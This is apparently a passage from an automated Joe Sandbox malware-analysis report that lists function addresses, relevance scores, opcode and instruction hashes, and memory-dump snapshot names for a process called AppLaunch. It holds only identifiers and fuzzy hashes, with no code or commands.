                                                                                                                                                                    • Instruction ID: 64af22f27fc6bd399dbb27681e171ac9afd57dcc31dabc6a0d87e001442a5e1a
                                                                                                                                                                    • Opcode Fuzzy Hash: 1e3b16e5bf20c8e87911bcff60a3c76a097706ddd194bd334d8c341b3d4058f1
                                                                                                                                                                    • Instruction Fuzzy Hash: D5D1F074D01228CFEB24DF65C844BEDBBF2EB89304F1095AAD50AA7250EB356AC4CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049108F8 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: k7n^
                                                                                                                                                                    • API String ID: 0-3135800245
                                                                                                                                                                    • Opcode ID: b6efbb2107fef62218385f5a013e3169f3e8fc8a5dc4375bcd9d57bdd95ab494
                                                                                                                                                                    • Instruction ID: c4ac9ab09ecfb441919aa25abcfaaf35572f84c2064a82bc9211c71016c65990
                                                                                                                                                                    • Opcode Fuzzy Hash: b6efbb2107fef62218385f5a013e3169f3e8fc8a5dc4375bcd9d57bdd95ab494
                                                                                                                                                                    • Instruction Fuzzy Hash: 4A91E074D01228CFEB64DF66C9447DDBBF1EB89308F0095AAD50AB7250EB746A85CF60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04912B60 Relevance: 1.4, Strings: 1, Instructions: 169COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 8ccj
                                                                                                                                                                    • API String ID: 0-3187526153
                                                                                                                                                                    • Opcode ID: 740b6003d3d1f742a411786dd27687053c99305b7e7093f3ef12a6aea9d0cc67
                                                                                                                                                                    • Instruction ID: 7c293bef2c8e81a067e2579e617b178be018f7de46d637418d6d98e0296ef73b
                                                                                                                                                                    • Opcode Fuzzy Hash: 740b6003d3d1f742a411786dd27687053c99305b7e7093f3ef12a6aea9d0cc67
                                                                                                                                                                    • Instruction Fuzzy Hash: 0F611B30901208CFCB04EFB8E95489DBBB6FF8A316B60956DE415B7291EF35984ACF15
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049144B8 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 8ccj
                                                                                                                                                                    • API String ID: 0-3187526153
                                                                                                                                                                    • Opcode ID: e58be4164649410e711570eb528e68acea9994f8bcdaafc088e94a1023f0f1aa
                                                                                                                                                                    • Instruction ID: 931727da78965ea4e0ca904d54ec978ada578e072eea28558ef1bea9dba3d5c2
                                                                                                                                                                    • Opcode Fuzzy Hash: e58be4164649410e711570eb528e68acea9994f8bcdaafc088e94a1023f0f1aa
                                                                                                                                                                    • Instruction Fuzzy Hash: 6C1125301047408FD311AF78D41461B7FE2EFD6319B158A2DD08A8B743CFB8680A8BA2
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049144C8 Relevance: 1.3, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 8ccj
                                                                                                                                                                    • API String ID: 0-3187526153
                                                                                                                                                                    • Opcode ID: 26e636ca910be6e7eeac2a06b1d624ed2507f0f6f97415c45163dd2547d3da50
                                                                                                                                                                    • Instruction ID: 9e8274f1b7e5e44ca0a85aab026b5cc8d09f01c22f0d9652fc23bfdeb41a3b40
                                                                                                                                                                    • Opcode Fuzzy Hash: 26e636ca910be6e7eeac2a06b1d624ed2507f0f6f97415c45163dd2547d3da50
                                                                                                                                                                    • Instruction Fuzzy Hash: 6F0175306007048BD714AFA5D51465B77E2EFD5319B10892CD14A47B42DFB9A8068BD6
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491EAD8 Relevance: .3, Instructions: 349COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8bc5333fc31cb1a8399298ddb757059ea5dd40c97e641482c1f4d510c7af88ff
                                                                                                                                                                    • Instruction ID: 87564b7334ee5ace3abcf554a04e3bd58f2cc719d5cb9100712f69c082f41b08
                                                                                                                                                                    • Opcode Fuzzy Hash: 8bc5333fc31cb1a8399298ddb757059ea5dd40c97e641482c1f4d510c7af88ff
                                                                                                                                                                    • Instruction Fuzzy Hash: 45E12834A0020ADFCB14DF65D598A9EBBB2FF89315F148968E8069B765DB34FC41CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 09BAF7C8 Relevance: .3, Instructions: 308COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.386999394.0000000009BA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BA0000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_9ba0000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: cc2dac999b3d073352f8cc2e874b3ecc77eee1863836dbd3d7eed7193968818c
                                                                                                                                                                    • Instruction ID: 6b9f5c3f4eb4d48d2a31e786274afe2718c60d8e0aa598465e88dc9120788941
                                                                                                                                                                    • Opcode Fuzzy Hash: cc2dac999b3d073352f8cc2e874b3ecc77eee1863836dbd3d7eed7193968818c
                                                                                                                                                                    • Instruction Fuzzy Hash: DDE1C274E01219DFDB14DFA9C484AADFBB2FF48310F2482A9D918AB355CB30A985CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04916E30 Relevance: .2, Instructions: 222COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 7d0647d71ffa4a12548c2ff0f3b580b1632325eeba21cc0c6d285624f4301059
                                                                                                                                                                    • Instruction ID: 456c492892303932f53018a71e99a063fd8e60af2208914d7b1bab6af4ef1140
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d0647d71ffa4a12548c2ff0f3b580b1632325eeba21cc0c6d285624f4301059
                                                                                                                                                                    • Instruction Fuzzy Hash: C181B035B012159FEB05DBB8C41456EBBB2EFC5314F1484AED80AEB391DA34ED46CB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491DB80 Relevance: .2, Instructions: 191COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 33eded5ec209032ee245a3674842b6b49ab30c4e68078a41dd886e54f8ea147f
                                                                                                                                                                    • Instruction ID: acc5b46281368c1e4a0cdc819c655dca83cc5a9e622e2fb85ad392bf6af13733
                                                                                                                                                                    • Opcode Fuzzy Hash: 33eded5ec209032ee245a3674842b6b49ab30c4e68078a41dd886e54f8ea147f
                                                                                                                                                                    • Instruction Fuzzy Hash: 51716D75E002198FDB14DFA9C4546AEBBF7BF89300F208529D805EB351EB70AD46CB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491EACA Relevance: .2, Instructions: 184COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 1e4c55bb8fed06f173ad5a3e245f9b6f2195386c55ded4b1e4ec787a054f2d1a
                                                                                                                                                                    • Instruction ID: 9c7a5b4255031b931398b3100ef2217ae0d0e99bb22076ef67415985688937aa
                                                                                                                                                                    • Opcode Fuzzy Hash: 1e4c55bb8fed06f173ad5a3e245f9b6f2195386c55ded4b1e4ec787a054f2d1a
                                                                                                                                                                    • Instruction Fuzzy Hash: A9811834A00209DFCB14DF65D598A9DBBB2FF88315B158968E816AB365DB34FC42CF90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491D968 Relevance: .2, Instructions: 153COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: fac7ffbf0e9db2b412bf128d0a033bc4ed1b4f18c2cedad1e7f664cdae06177c
                                                                                                                                                                    • Instruction ID: ebe6bc06188bf3f6336f2d2a1120719c7ca64fdb9d78d4a207d7b5950371a1c6
                                                                                                                                                                    • Opcode Fuzzy Hash: fac7ffbf0e9db2b412bf128d0a033bc4ed1b4f18c2cedad1e7f664cdae06177c
                                                                                                                                                                    • Instruction Fuzzy Hash: 7251D935A01219EFCF14DFA4E894AADBBB6FF88311F148529E806A7360DB35AD41CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04912541 Relevance: .1, Instructions: 143COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 0c58bb532d204eb7f2e05cc787ff98fdf2012f677205e5f74950740ecb1f642f
                                                                                                                                                                    • Instruction ID: a6f35eacbf969efc061bf3fb0d4b65b4e848beb0d2225fb2eca4802a686d3ca5
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c58bb532d204eb7f2e05cc787ff98fdf2012f677205e5f74950740ecb1f642f
                                                                                                                                                                    • Instruction Fuzzy Hash: F951B174E01208CFDB18DFA5D99459DBBB2FF88301F20856DE806AB355DB356846CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491EE99 Relevance: .1, Instructions: 140COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 8d19f935126539eff2c3f1501432026de9f1f1d826691183657df2401442ae80
                                                                                                                                                                    • Instruction ID: 0c08b1d8930ce12d0329a2ac7bd3ff86ae23864db393090809fb6a3a5890d89b
                                                                                                                                                                    • Opcode Fuzzy Hash: 8d19f935126539eff2c3f1501432026de9f1f1d826691183657df2401442ae80
                                                                                                                                                                    • Instruction Fuzzy Hash: 6351A734A00209DFCB14DFA5D598A9DBBB2FF88315F158968E816AB365CB35EC41CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04912550 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e2543e737b65d05f7c80c03e3bd8ff2b8cfa5f3980c12a3d7132250565af5458
                                                                                                                                                                    • Instruction ID: c73187b475cc028018642115e99a02a76703878d3c9db144c92cc13365c9f381
                                                                                                                                                                    • Opcode Fuzzy Hash: e2543e737b65d05f7c80c03e3bd8ff2b8cfa5f3980c12a3d7132250565af5458
                                                                                                                                                                    • Instruction Fuzzy Hash: 9851AE74E01208DFDB18DFE9D9945ADBBB2FF88301F208529E80AAB755DB356846CF50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491DE60 Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5dd29ea8e4108de5c601ed58db8330d5c4bda57a00a15b7658901024b68b57d4
                                                                                                                                                                    • Instruction ID: 9037798416defdfb58265b37395b17741dbf73c95fcede8b3c9291ab32310edf
                                                                                                                                                                    • Opcode Fuzzy Hash: 5dd29ea8e4108de5c601ed58db8330d5c4bda57a00a15b7658901024b68b57d4
                                                                                                                                                                    • Instruction Fuzzy Hash: 9841CF31B042098FD704DBA9D4647BEBBB6EF85311F1481BAD40ADB3A1DB31AD46CB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491B090 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 30de0b4f9226da7554b09465945cd722891914c984b73da8616f1d53ee55e063
                                                                                                                                                                    • Instruction ID: d9729e7327d9904e345871cd03496aa949f8b1c731f2e6999ebef97043c7ba2e
                                                                                                                                                                    • Opcode Fuzzy Hash: 30de0b4f9226da7554b09465945cd722891914c984b73da8616f1d53ee55e063
                                                                                                                                                                    • Instruction Fuzzy Hash: 3D410930B402589FDB14EBB9D8147AE7BF2EF85304F008069D901EB395DF79AD068BA1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04917E3A Relevance: .1, Instructions: 110COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: fea952b80432cc090618dd8f8cf6191b35186ccb73698e2e7469e309b1704cf5
                                                                                                                                                                    • Instruction ID: 421519052bc6e5e6d64e2e0de1de49ee7c353c5c46a34c669a6061edbc873f34
                                                                                                                                                                    • Opcode Fuzzy Hash: fea952b80432cc090618dd8f8cf6191b35186ccb73698e2e7469e309b1704cf5
                                                                                                                                                                    • Instruction Fuzzy Hash: 613193353002168BCB156BB8D1281AA7BE3EFC4356B15897EE106CBB66DE389D07C791
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04918350 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: fbff0c17847e6bccda8e0dd43d0ba9a272ad639c79e505097fc121a9b01731f7
                                                                                                                                                                    • Instruction ID: 0eed4ade48572b17a6a1748b57b783b19b9aa166853dd1f072b3f9d1670f6cd1
                                                                                                                                                                    • Opcode Fuzzy Hash: fbff0c17847e6bccda8e0dd43d0ba9a272ad639c79e505097fc121a9b01731f7
                                                                                                                                                                    • Instruction Fuzzy Hash: CB315A347002188FC714EF68D4A4AAE7BF2EB89700F14546CE9069B3A5CF35AD02DF90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04918360 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: a0cbbd8827583821b0cda41b57828d1512035acfe6077c6ff85e505ac9866530
                                                                                                                                                                    • Instruction ID: 19226eac2275eaf78c69027b2f1368b59100e1920dec5ef5d53f5f7ffac5f44a
                                                                                                                                                                    • Opcode Fuzzy Hash: a0cbbd8827583821b0cda41b57828d1512035acfe6077c6ff85e505ac9866530
                                                                                                                                                                    • Instruction Fuzzy Hash: DC314D347002188FD714EFA8C5A86AE7BE6EF89741F14446CE9069B3A1DE35AC42DB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491B7F7 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 9b763cbc4c7a42a700ef0b4a6c92c63a33fb7c315a693894a5c544fc88ac6bc8
                                                                                                                                                                    • Instruction ID: 786db7c5891dcabe4ce6b9f763f5cc59a4ae2b7a21d56a2481f71565bbaf88a7
                                                                                                                                                                    • Opcode Fuzzy Hash: 9b763cbc4c7a42a700ef0b4a6c92c63a33fb7c315a693894a5c544fc88ac6bc8
                                                                                                                                                                    • Instruction Fuzzy Hash: F4319D71E00B4A9ACB11AFB4C8402C9B771FF99310F21972AE55677201EB70B5D5CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 049185C8 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 2b5eb1f4ad8d735b019573686f2dc54d1e17fa773f1de346bf49c9c045239f74
                                                                                                                                                                    • Instruction ID: 1b06d8f643daa54981bc1098329aff0b8311591fac95e2fa22be4ec87a0ddf70
                                                                                                                                                                    • Opcode Fuzzy Hash: 2b5eb1f4ad8d735b019573686f2dc54d1e17fa773f1de346bf49c9c045239f74
                                                                                                                                                                    • Instruction Fuzzy Hash: 172135347043604FD714A7B9A46803E3FE3AFC634431488BED50ACBB82EE34AC0683A1
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04915638 Relevance: .1, Instructions: 87COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: d0d92c26be6ef014a1a7034a6f0465f08eadf5f291ce27b358293651242bcd2f
                                                                                                                                                                    • Instruction ID: 566cd93cee2dbb91a85eff4c44be3e9cb08978dc0cbc8bd618cbf33e89817640
                                                                                                                                                                    • Opcode Fuzzy Hash: d0d92c26be6ef014a1a7034a6f0465f08eadf5f291ce27b358293651242bcd2f
                                                                                                                                                                    • Instruction Fuzzy Hash: D9416F75900209DFCF01DFE4EA5999C7FB2FF88311F009018E916A7662D739695AEF20
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0491B808 Relevance: .1, Instructions: 85COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 76476887719185cf0e9566472930456caef03529762fa7d003772cff2081c2e0
                                                                                                                                                                    • Instruction ID: 7156c188f85c93c63e7cabfc53e28c5174267c553270364398ea4c140108a770
                                                                                                                                                                    • Opcode Fuzzy Hash: 76476887719185cf0e9566472930456caef03529762fa7d003772cff2081c2e0
                                                                                                                                                                    • Instruction Fuzzy Hash: 93316931E10B0A9ADB10EFB9C841699F371FF99320F219729E95A77240EB70B5D5CB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04915648 Relevance: .1, Instructions: 83COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 14389977abea4a3738ea6d2b6402b13d9a5b1bfbfedf524b2c8c48e16ed17314
                                                                                                                                                                    • Instruction ID: f4c78bb6bfddf893b1dfd5ba600be27c956f74cc6fc8d9064b8ca99b926baa21
                                                                                                                                                                    • Opcode Fuzzy Hash: 14389977abea4a3738ea6d2b6402b13d9a5b1bfbfedf524b2c8c48e16ed17314
                                                                                                                                                                    • Instruction Fuzzy Hash: 25316F75900209DFCF00DFE4EA5999C7FB2FF88311F009018EA1667662D73A695AEF60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04914C00 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.372029317.0000000004910000.00000040.00000800.00020000.00000000.sdmp, Offset: 04910000, based on PE: false
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_4910000_AppLaunch.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b10d669e6e450ddeba05b6a61be6d4ca0862aeb0e687db7300dad92793ae894f
                                                                                                                                                                    • Instruction ID: 80b4ed8165611ca389f031deb619fbc23c2c7cd50ca45f9516c7b461bdd5d3d7
                                                                                                                                                                    • Opcode Fuzzy Hash: b10d669e6e450ddeba05b6a61be6d4ca0862aeb0e687db7300dad92793ae894f
                                                                                                                                                                    • Instruction Fuzzy Hash: 08314B75900305EFCB01DFE4ED66A6D7FB2FB88300F149458EA029A262D73A1956EF61
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 04918AD8 Relevance: .1, Instructions: 81COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
